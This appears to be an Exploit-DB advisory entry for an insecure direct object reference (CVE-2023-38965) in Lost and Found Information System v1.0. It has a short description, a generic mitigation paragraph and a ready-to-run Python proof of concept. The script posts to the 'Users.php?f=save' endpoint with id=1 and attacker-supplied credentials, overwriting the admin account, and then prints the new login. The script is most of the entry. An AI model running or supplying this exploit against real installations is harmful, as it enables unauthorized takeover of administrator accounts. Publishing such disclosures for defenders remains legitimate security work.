Lost and Found Information System v1.0 - Insecure Direct Object Reference leads to Account Takeover

vendor:

Lost and Found Information System

by:

OR4NG.M4N

8.1

CVSS

CRITICAL

Insecure Direct Object Reference (IDOR)

862

CWE

Product Name: Lost and Found Information System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-2023-38965

CPE: a:lost_and_found_information_system:lost_and_found_information_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Web

2023

Lost and Found Information System v1.0 – Insecure Direct Object Reference leads to Account Takeover

The exploit allows an attacker to perform an Account Takeover by manipulating the 'id' parameter in the URL of the 'Users.php?f=save' endpoint in Lost and Found Information System v1.0. By changing the 'id' parameter, an attacker can access other user accounts without proper authorization. This vulnerability has been assigned CVE-2023-38965.

Mitigation:

To mitigate this vulnerability, developers should implement proper access controls and validation mechanisms to prevent unauthorized access to user accounts. It is recommended to use session tokens or unique identifiers to authenticate users instead of relying solely on object references.

Source

Exploit-DB raw data:

# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over 
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965

Python p0c :

import argparse
import requests
import time
parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()


url = args.url + '/classes/Users.php?f=save'


data = {
    'id': '1',
    'firstname': 'or4ng',
    'middlename': '',
    'lastname': 'Admin',
    'username': args.user,
    'password': args.password
}

response = requests.post(url, data)
if b"1" in response.content:
    print("Exploit ..")
    time.sleep(1)
    print("User :" + args.user + "\nPassword :" + args.password)
else:
    print("Exploit Failed..")